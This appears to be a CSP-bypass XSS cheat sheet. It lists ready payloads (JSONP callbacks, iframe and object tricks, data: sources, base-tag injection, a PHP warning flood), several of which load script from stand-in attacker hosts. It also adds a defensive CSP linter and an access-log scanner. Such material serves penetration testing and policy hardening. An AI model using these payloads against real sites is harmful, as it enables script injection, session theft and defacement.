# XSS Injection - CSP Bypass

A Content Security Policy (CSP) is a browser security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. The server declares, in the `Content-Security-Policy` response header, which sources of content (scripts, styles, images, etc.) are allowed to load and execute on a page; anything outside that allow list is blocked by the browser.
## Bypass CSP using JSONP from a whitelisted origin

Requirements:

```
script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```

Payload: use a callback function from a whitelisted source listed in the CSP.

```
//google.com/complete/search?client=chrome&jsonp=alert(1);
https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();
https://www.youtube.com/oembed?callback=alert;
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
## Bypass CSP using an iframe of a same-origin resource

Requirements:

```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```

Payload:

```
http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;
```

```js
script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js';
window.frames[0].document.head.appendChild(script);
```

Source: lab.wallarm.com
## Bypass CSP using an iframe of a same-origin CSS file

Requirements: inline scripts or `eval` allowed by the policy.

Payload:

```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
```

Source: Rhynorater
## Bypass CSP using an object tag

Requirements:

```
script-src self
```

Payload:

```html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```

Source: @akita_zen
## Bypass CSP using data: in script-src

Requirements: `script-src 'self' data:`, a configuration the official Mozilla documentation explicitly warns against.

Payload:

```html
<script src="data:,alert(1)">/</script>
```

Source: @404death
## Bypass CSP using 'unsafe-inline'

Requirements:

```
script-src https://google.com 'unsafe-inline';
```

Payload:

```html
"/><script>alert(1);</script>
```
## Bypass CSP nonces using a base tag

Requirements: `script-src 'nonce-RANDOM_NONCE'`, with the page loading a script by relative path:

```html
<script src='/PATH.js'></script>
```

Payload:

1. Inject a base tag:

```html
<base href=http://www.attacker.com>
```

2. Host your custom JS file at the same path as one of the website's scripts:

```
http://www.attacker.com/PATH.js
```
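The bypasses above each depend on a recognisable weakness in the policy itself: a whitelisted origin that serves JSONP callbacks, `'unsafe-inline'` without a nonce or hash, `data:` in `script-src`, no `base-uri` (base tag injection), or no `object-src`/`default-src` fallback. The following static linter, an added example that is not code from the original cheat sheet, parses a CSP header value and reports which of those conditions apply. `JSONP_HOSTS` is a constructed, non-exhaustive set built from the hosts named on this page; the finding texts are this example's own wording.

```python
"""Static CSP linter for the weaknesses the bypasses above rely on.

Added example (not code from the original cheat sheet). It parses a
Content-Security-Policy header value and reports: an effective script-src
that allows 'unsafe-inline' without a nonce/hash, one that allows data:
URIs, a whitelisted origin known to serve JSONP callbacks, a missing
base-uri directive, and a missing object-src/default-src fallback.
JSONP_HOSTS is a constructed, non-exhaustive list built from the hosts
named on this page; extend it from your own whitelist review.
"""
from typing import Dict, List, Optional

JSONP_HOSTS = {
    "google.com", "www.google.com", "accounts.google.com",
    "translate.googleapis.com", "www.youtube.com",
}
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP value into {directive: [sources]}.

    A leading "Content-Security-Policy:" header name is tolerated; a
    repeated directive is ignored after its first occurrence, as browsers do.
    """
    value = header.strip()
    if value.lower().startswith("content-security-policy:"):
        value = value.split(":", 1)[1]
    policy: Dict[str, List[str]] = {}
    for chunk in value.split(";"):
        parts = chunk.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective_sources(policy: Dict[str, List[str]], directive: str) -> Optional[List[str]]:
    """Sources governing `directive`, honouring the fallback to default-src.

    None means neither the directive nor default-src is set: no restriction.
    """
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")


def _host_of(source: str) -> str:
    """Reduce a source expression such as https://www.google.com:443/x to its host."""
    s = source.lower()
    if "://" in s:
        s = s.split("://", 1)[1]
    return s.split("/", 1)[0].split(":", 1)[0]


def _serves_jsonp(source: str) -> bool:
    """True if the source (or the wildcard it expands to) is a known JSONP host."""
    host = _host_of(source)
    if host.startswith("*."):
        return any(h.endswith(host[1:]) for h in JSONP_HOSTS)
    return host in JSONP_HOSTS


def audit_csp(header: str) -> List[str]:
    """Return findings; an empty list means none of this page's bypass conditions apply."""
    policy = parse_csp(header)
    findings: List[str] = []
    scripts = effective_sources(policy, "script-src")
    if scripts is None:
        findings.append("no script-src and no default-src: script loading is unrestricted")
    else:
        lowered = [s.lower() for s in scripts]
        # Browsers that understand nonces/hashes ignore 'unsafe-inline' when one is present.
        has_nonce_or_hash = any(s.startswith(NONCE_OR_HASH) for s in lowered)
        if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
            findings.append("script-src allows 'unsafe-inline': injected inline <script> executes")
        if "data:" in lowered:
            findings.append('script-src allows data: URIs: <script src="data:,..."> executes')
        for src in scripts:
            if _serves_jsonp(src):
                findings.append(f"script-src whitelists {src}, which serves JSONP endpoints "
                                "(callback= script injection)")
    if "base-uri" not in policy:
        findings.append("no base-uri: an injected <base href> redirects relative script URLs, "
                        "defeating nonces")
    if effective_sources(policy, "object-src") is None:
        findings.append('no object-src or default-src: <object data="data:text/html;base64,..."> '
                        "is not restricted")
    return findings


if __name__ == "__main__":
    for finding in audit_csp("script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';"):
        print("-", finding)
```

Feed it the `Requirements:` policies from the sections above to see which finding each one triggers; a policy that combines a nonce with `base-uri 'none'` and `object-src 'none'` comes back clean. The host check is deliberately coarse (it does not understand path-restricted sources), so treat its output as a review prompt rather than a verdict.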
## Bypass CSP by preventing PHP from sending the header

Requirements: the CSP header is set from PHP with the `header()` function.

Payload:

In the default php:apache image configuration, PHP cannot modify headers once response body data has already been written. That happens when the PHP engine raises a warning: the warning text is written to the output, which starts the response, so a later `header()` call fails and the CSP header is never sent.

Here are several ways to generate a warning:

```
GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
```

If warnings are configured to be displayed you should get these:

```
PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
Cannot modify header information - headers already sent in /var/www/html/index.php on line 2
```

Source: @pilvar222
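On the defending side, the request that triggers this warning is easy to spot in access logs: it carries far more query parameters than any legitimate page needs. The following log check, an added example that is not code from the original cheat sheet, parses combined-format access-log lines, counts the query-string parameters of each request, and flags any that exceed `max_input_vars` (the php.ini setting named above; 1000 is PHP's default), together with HTML markup in the decoded query. `SAMPLE_LOG` is constructed for this example and the counting is an approximation of PHP's (it only sees GET parameters; POST bodies are not in the access log).

```python
"""Access-log check for requests that try to exceed PHP's max_input_vars.

Added example (not code from the original cheat sheet). It parses
Apache/nginx combined-format lines, counts the query-string parameters of
each request, and flags any that exceed max_input_vars (the php.ini
setting named above; 1000 is PHP's default), together with HTML markup in
the decoded query. SAMPLE_LOG is constructed for this example. Only GET
parameters are visible here; a POST flood needs request-body logging.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

MAX_INPUT_VARS = 1000  # PHP default; match it to your php.ini

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: one ordinary request, one carrying 1200 dummy "&a" parameters.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /?xss=%3Cscript%3Ealert(1)%3C/script%3E'
    + "&a" * 1200 + ' HTTP/1.1" 200 2048',
]


def count_input_vars(path: str) -> int:
    """Approximate PHP's input-variable count: non-empty '&'-separated fields after '?'."""
    if "?" not in path:
        return 0
    query = path.split("?", 1)[1]
    return sum(1 for field in query.split("&") if field)


def flag_request(path: str, limit: int = MAX_INPUT_VARS) -> List[str]:
    """Reasons a single request path is suspicious; empty list when it is not."""
    reasons: List[str] = []
    n = count_input_vars(path)
    if n > limit:
        reasons.append(f"{n} query parameters exceed max_input_vars={limit}: "
                       "PHP emits a startup warning and later header() calls fail")
    decoded = unquote(path).lower()
    if "<script" in decoded or "<base" in decoded:
        reasons.append("HTML markup in the query string")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per flagged request: client IP, truncated path, reasons."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = flag_request(m.group("path"))
        if reasons:
            hits.append({
                "ip": m.group("ip"),
                "path": m.group("path")[:60] + "...",
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"])
        for reason in hit["reasons"]:
            print("  -", reason)
```

A hit on the parameter-count rule is worth correlating with the PHP error log: the `Input variables exceeded` and `headers already sent` warnings quoted above will appear there at the same timestamp. Setting the CSP header in the web server configuration rather than from PHP removes this dependency on `header()` being reached before any output.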